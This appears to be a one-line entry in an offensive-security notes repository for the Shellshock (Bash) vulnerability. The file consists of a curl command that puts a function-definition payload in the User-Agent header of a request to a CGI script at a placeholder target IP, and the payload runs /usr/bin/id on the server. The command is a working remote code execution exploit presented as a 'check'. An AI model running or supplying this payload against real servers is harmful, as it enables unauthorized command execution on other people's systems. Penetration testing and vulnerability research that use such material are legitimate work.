killchain-compendium/Exploits/Linux/Shell Shock.md

171 B

Shell Shock

  • Check target via
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://<target-IP>/cgi-bin/test/test.cgi